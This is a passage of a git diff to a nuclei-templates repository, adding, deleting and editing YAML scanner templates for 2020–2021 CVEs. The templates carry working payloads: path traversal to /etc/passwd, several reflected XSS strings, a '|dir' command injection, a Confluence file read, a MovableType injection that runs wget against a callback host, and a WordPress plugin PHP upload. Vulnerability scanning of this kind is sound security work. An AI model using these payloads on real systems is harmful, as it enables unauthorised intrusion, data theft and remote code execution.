a/nuclei-templates/CVE-2020/CVE-2020-8191.yaml b/nuclei-templates/CVE-2020/cve-2020-8191.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8191.yaml rename to nuclei-templates/CVE-2020/cve-2020-8191.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8497.yaml b/nuclei-templates/CVE-2020/cve-2020-8497.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8497.yaml rename to nuclei-templates/CVE-2020/cve-2020-8497.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8515.yaml b/nuclei-templates/CVE-2020/cve-2020-8515.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8515.yaml rename to nuclei-templates/CVE-2020/cve-2020-8515.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8654.yaml b/nuclei-templates/CVE-2020/cve-2020-8654.yaml deleted file mode 100644 index 014f5cb558..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-8654.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2020-8654 - -info: - name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution - author: praetorian-thendrickson - severity: high - description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465. - reference: - - https://github.com/h4knet/eonrce - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb - - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8654 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-8654 - cwe-id: CWE-78 - tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 - -requests: - - method: GET - path: - - "{{BaseURL}}/css/eonweb.css" - - extractors: - - type: regex - name: version - internal: true - part: body - group: 1 - regex: - - '# VERSION : ([0-9.]+)' - - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(version, '< 5.4', '>= 5.1') - - - type: word - part: body - words: - - "EyesOfNetwork" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8813.yaml b/nuclei-templates/CVE-2020/cve-2020-8813.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8813.yaml rename to nuclei-templates/CVE-2020/cve-2020-8813.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9054.yaml b/nuclei-templates/CVE-2020/cve-2020-9054.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9054.yaml rename to nuclei-templates/CVE-2020/cve-2020-9054.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9315.yaml b/nuclei-templates/CVE-2020/cve-2020-9315.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9315.yaml rename to nuclei-templates/CVE-2020/cve-2020-9315.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9425.yaml b/nuclei-templates/CVE-2020/cve-2020-9425.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9425.yaml rename to nuclei-templates/CVE-2020/cve-2020-9425.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9483.yaml b/nuclei-templates/CVE-2020/cve-2020-9483.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9483.yaml rename to nuclei-templates/CVE-2020/cve-2020-9483.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9490.yaml b/nuclei-templates/CVE-2020/cve-2020-9490.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9490.yaml rename to nuclei-templates/CVE-2020/cve-2020-9490.yaml diff --git a/nuclei-templates/CVE-2020/cve-20200924a(1).yaml b/nuclei-templates/CVE-2020/cve-20200924a(1).yaml deleted file mode 100644 index 2f0b34a3f6..0000000000 --- a/nuclei-templates/CVE-2020/cve-20200924a(1).yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-20200924a - -info: - name: Web requests can navigate outside of DRP controlled areas - Directory traversal - author: c-sh0 - severity: critical - description: Web requests can navigate outside of DRP controlled areas - Directory traversal - reference: - - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html - - https://docs.rackn.io/en/latest/doc/release.html - - https://registry.hub.docker.com/v1/repositories/digitalrebar/provision/tags - - Affected versions - v4.3.0, v4.3.2, v4.3.3, v4.4.0 (maybe others) - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-20200924a - cwe-id: CWE-22 - tags: cve,cve2020,lfi,rackn,digitalrebar - -requests: - - method: GET - path: - - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - 'X-Drp-Sha256sum:' - - - type: regex - regex: - - "root:.*:0:0" - diff --git a/nuclei-templates/CVE-2020/cve-20200924a.yaml b/nuclei-templates/CVE-2020/cve-20200924a.yaml new file mode 100644 index 0000000000..7bfd8f9b88 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-20200924a.yaml @@ -0,0 +1,33 @@ +id: CVE-20200924a +info: + name: Web requests can navigate outside of DRP controlled areas - Directory traversal + author: c-sh0 + severity: critical + description: Web requests can navigate outside of DRP controlled areas - Directory traversal + reference: + - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html + - https://docs.rackn.io/en/latest/doc/release.html + - https://registry.hub.docker.com/v1/repositories/digitalrebar/provision/tags + - Affected versions - v4.3.0, v4.3.2, v4.3.3, v4.4.0 (maybe others) + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-20200924a + cwe-id: CWE-22 + tags: cve,cve2020,lfi,rackn,digitalrebar +requests: + - method: GET + path: + - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - 'X-Drp-Sha256sum:' + - type: regex + regex: + - "root:.*:0:0" diff --git a/nuclei-templates/CVE-2021/cve-2021-1498.yaml b/nuclei-templates/CVE-2021/CVE-2021-1498.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-1498.yaml rename to nuclei-templates/CVE-2021/CVE-2021-1498.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-20092.yaml b/nuclei-templates/CVE-2021/CVE-2021-20092.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-20092.yaml rename to nuclei-templates/CVE-2021/CVE-2021-20092.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-20124.yaml b/nuclei-templates/CVE-2021/CVE-2021-20124.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-20124.yaml rename to nuclei-templates/CVE-2021/CVE-2021-20124.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-20137.yaml b/nuclei-templates/CVE-2021/CVE-2021-20137.yaml deleted file mode 100644 index ec87cd9710..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-20137.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-20137 -info: - name: Gryphon Tower - Reflected XSS - author: edoardottt - severity: medium - description: A reflected cross-site scripting vulnerability exists in the url parameter of the /cgi-bin/luci/site_access/ page on the Gryphon Tower router's web interface. An attacker could exploit this issue by tricking a user into following a specially crafted link, granting the attacker javascript execution in the context of the victim's browser. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-20137 - cwe-id: CWE-79 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-20137 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137 - - https://www.tenable.com/security/research/tra-2021-51 - tags: cve,cve2021,gryphon,xss -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/html" - - type: word - part: body - words: - - 'onfocus=alert(document.domain) autofocus=1>' - - 'Send Access Request URL' - condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-20837.yaml b/nuclei-templates/CVE-2021/CVE-2021-20837.yaml index d9fa45c868..8433e63c9d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-20837.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-20837.yaml @@ -1,23 +1,56 @@ id: CVE-2021-20837 info: - name: RCE in MovableType - author: zin_min_phyo + name: MovableType - Remote Command Injection + author: dhiyaneshDK,hackergautam severity: critical - reference: https://nemesis.sh/posts/movable-type-0day/ - tags: MovableType,RCE + description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. + reference: + - https://nemesis.sh/posts/movable-type-0day/ + - https://github.com/ghost-nemesis/cve-2021-20837-poc + - https://twitter.com/cyber_advising/status/1454051725904580608 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20837 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-20837 + cwe-id: CWE-78 + tags: cve,cve2021,rce,movable requests: - - method: POST - path: - - "{{BaseURL}}/cgi-bin/mt/mt-xmlrpc.cgi" + - raw: + - | + POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml - body: 'mt.handler_to_coderefYGNhdCAvZXRjL3Bhc3N3ZGA=' + + + mt.handler_to_coderef + + + + + {{base64("`wget http://{{interactsh-url}}`")}} + + + + + - - + matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + words: + - "failed loading package" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/cve-2021-21287.yaml b/nuclei-templates/CVE-2021/CVE-2021-21287.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21287.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21287.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21799.yaml b/nuclei-templates/CVE-2021/CVE-2021-21799.yaml new file mode 100644 index 0000000000..44d996dca0 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-21799.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-21799 +info: + name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting + author: arafatansari + severity: medium + description: | + Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the telnet_form.php script functionality. + reference: + - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-21799 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"R-SeeNet" + verified: "true" + tags: cve,cve2021,xss,r-seenet +requests: + - method: GET + path: + - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Telnet " + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21801.yaml b/nuclei-templates/CVE-2021/CVE-2021-21801.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21801.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21801.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-21802.yaml b/nuclei-templates/CVE-2021/CVE-2021-21802.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21802.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21802.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21805.yaml b/nuclei-templates/CVE-2021/CVE-2021-21805.yaml deleted file mode 100644 index 46e88b33e8..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21805.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-21805 -info: - name: Advantech R-SeeNet v 2.4.12 - OS Command Injection - author: arafatansari - severity: critical - description: | - Advantech R-SeeNet v 2.4.12 is vulnerable to OS Command Injection in the ping.php script functionality. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21805 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-21805 - cwe-id: CWE-78 - metadata: - shodan-query: http.html:"R-SeeNet" - verified: "true" - tags: cve,cve2021,rce,r-seenet -requests: - - method: GET - path: - - "{{BaseURL}}/php/ping.php?hostname=|dir" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Ping |dir" - - "bottom.php" - condition: and - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21881.yaml b/nuclei-templates/CVE-2021/CVE-2021-21881.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21881.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21881.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-22873.yaml b/nuclei-templates/CVE-2021/CVE-2021-22873.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-22873.yaml rename to nuclei-templates/CVE-2021/CVE-2021-22873.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24210.yaml b/nuclei-templates/CVE-2021/CVE-2021-24210.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24210.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24210.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24274.yaml b/nuclei-templates/CVE-2021/CVE-2021-24274.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24274.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24274.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24284.yaml b/nuclei-templates/CVE-2021/CVE-2021-24284.yaml new file mode 100644 index 0000000000..f2e969c7a6 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24284.yaml @@ -0,0 +1,62 @@ +id: CVE-2021-24284 +info: + name: WordPress Kaswara Modern VC Addons - File Upload RCE + author: lamscun,pussycat0x,pdteam + severity: critical + description: | + The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. + reference: + - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 + - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 + - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ + - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/ + - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24284 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24284 + cwe-id: CWE-434 + tags: cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload +variables: + zip_file: "{{to_lower(rand_text_alpha(6))}}" + php_file: "{{to_lower(rand_text_alpha(2))}}.php" + php_cmd: "" +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708 + + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip" + Content-Type: application/octet-stream + + {{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}} + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="fontsetname" + + {{zip_file}} + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="action" + + uploadFontIcon + --------------------------d3be34324392a708-- + - | + GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" + - type: word + part: body_2 + words: + - "phpinfo()" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-24291.yaml b/nuclei-templates/CVE-2021/CVE-2021-24291.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24291.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24291.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24300.yaml b/nuclei-templates/CVE-2021/CVE-2021-24300.yaml deleted file mode 100644 index 04d0926f66..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24300.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2021-24300 -info: - name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS - author: cckuailong - severity: medium - description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue. - reference: - - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24300 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24300 - cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'value="\"onmouseover=alert(document.domain);//">' - - "PickPlugins Product Slider" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-24335.yaml b/nuclei-templates/CVE-2021/CVE-2021-24335.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24335.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24335.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24472.yaml b/nuclei-templates/CVE-2021/CVE-2021-24472.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24472.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24472.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24498.yaml b/nuclei-templates/CVE-2021/CVE-2021-24498.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24498.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24498.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24746.yaml b/nuclei-templates/CVE-2021/CVE-2021-24746.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24746.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24746.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24987.yaml b/nuclei-templates/CVE-2021/CVE-2021-24987.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24987.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24987.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24991.yaml b/nuclei-templates/CVE-2021/CVE-2021-24991.yaml new file mode 100644 index 0000000000..a8de905167 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24991.yaml @@ -0,0 +1,47 @@ +id: CVE-2021-24991 + +info: + name: WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting + author: cckuailong + severity: medium + description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard. + reference: + - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24991 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2021-24991 + cwe-id: CWE-79 + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x" + - "WooCommerce PDF Invoices" + condition: and + + - type: status + status: + - 200 + +# Enhanced by cs 08/16/2022 diff --git a/nuclei-templates/CVE-2021/cve-2021-25028.yaml b/nuclei-templates/CVE-2021/CVE-2021-25028.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-25028.yaml rename to nuclei-templates/CVE-2021/CVE-2021-25028.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-25052.yaml b/nuclei-templates/CVE-2021/CVE-2021-25052.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-25052.yaml rename to nuclei-templates/CVE-2021/CVE-2021-25052.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-25085.yaml b/nuclei-templates/CVE-2021/CVE-2021-25085.yaml new file mode 100644 index 0000000000..6dae7e423c --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-25085.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-25085 +info: + name: WOOF WordPress plugin - Reflected Cross-Site Scripting + author: Maximus Decimus + severity: medium + description: | + The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting. + reference: + - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90 + - https://plugins.trac.wordpress.org/changeset/2648751 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25085 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25085 + metadata: + verified: true + tags: cve,cve2021,wordpress,wp-plugin,wp,xss +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"additional_fields":[""]}' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by cs 06/21/2022 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25118.yaml b/nuclei-templates/CVE-2021/CVE-2021-25118.yaml deleted file mode 100644 index f037f16c59..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25118.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-25118 -info: - name: Yoast SEO < 17.3 - Path Disclosure - author: DhiyaneshDK - severity: medium - description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. - reference: - - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25118 - - https://plugins.trac.wordpress.org/changeset/2608691 - remediation: Fixed in version 17.3 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-25118 - cwe-id: CWE-200 - tags: wordpress,cve2021,wp-plugin,fpd,cve,wp -requests: - - method: GET - path: - - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1" - matchers-condition: and - matchers: - - type: regex - regex: - - '"path":"(.*)/wp-content\\(.*)","size' - - type: word - part: header - words: - - "application/json" - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '"path":"(.*)/wp-content\\(.*)","size' diff --git a/nuclei-templates/CVE-2021/CVE-2021-25120.yaml b/nuclei-templates/CVE-2021/CVE-2021-25120.yaml deleted file mode 100644 index 62a8c9e125..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25120.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-25120 -info: - name: Easy Social Feed < 6.2.7 - Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor. - reference: - - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0 - - https://www.cvedetails.com/cve/CVE-2021-25120/ - - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25120 - cwe-id: CWE-79 - tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "'type' : ''" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/CVE-2021-26085.yaml b/nuclei-templates/CVE-2021/CVE-2021-26085.yaml new file mode 100644 index 0000000000..f2032f23ff --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-26085.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-26085 +info: + name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085 + author: princechaddha + severity: medium + description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. + reference: + - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 + - https://jira.atlassian.com/browse/CONFSERVER-67893 + - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-26085 + cwe-id: CWE-862 + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2021,confluence,atlassian,lfi,kev +requests: + - method: GET + path: + - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "Confluence" + - "com.atlassian.confluence.setup.ConfluenceAppConfig" + condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-26702.yaml b/nuclei-templates/CVE-2021/CVE-2021-26702.yaml deleted file mode 100644 index 67a641543d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-26702.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2021-26702 -info: - name: EPrints 3.4.2 XSS - author: ritikchaddha - severity: medium - description: EPrints 3.4.2 exposes a reflected XSS opportunity in the dataset 